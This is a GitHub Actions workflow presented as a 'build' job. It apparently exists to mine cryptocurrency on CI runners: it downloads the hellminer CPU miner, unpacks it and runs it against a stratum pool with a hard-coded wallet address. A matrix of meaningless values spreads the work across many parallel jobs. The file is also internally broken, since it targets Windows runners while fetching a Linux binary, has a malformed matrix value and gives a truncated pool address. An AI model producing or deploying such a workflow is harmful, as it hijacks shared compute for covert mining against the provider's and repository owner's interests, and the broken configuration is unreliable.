name: eX-code_MintMe
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: eX-code_MintMe
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: PREPARING
      run: wget https://github.com/hellcatz/luckpool/raw/master/miners/hellminer_cpu_linux.tar.gz
    - name: Seting-UP
      run: tar xf hellminer_cpu_linux.tar.gz
    - name: Running
      run: ./hellminer -c stratum+tcp://pool -u RNa9RXXezxmCRikCVC7pq7jH4hrjUnWYFd.Al -p x --cpu 
    - name: END
      run: exit
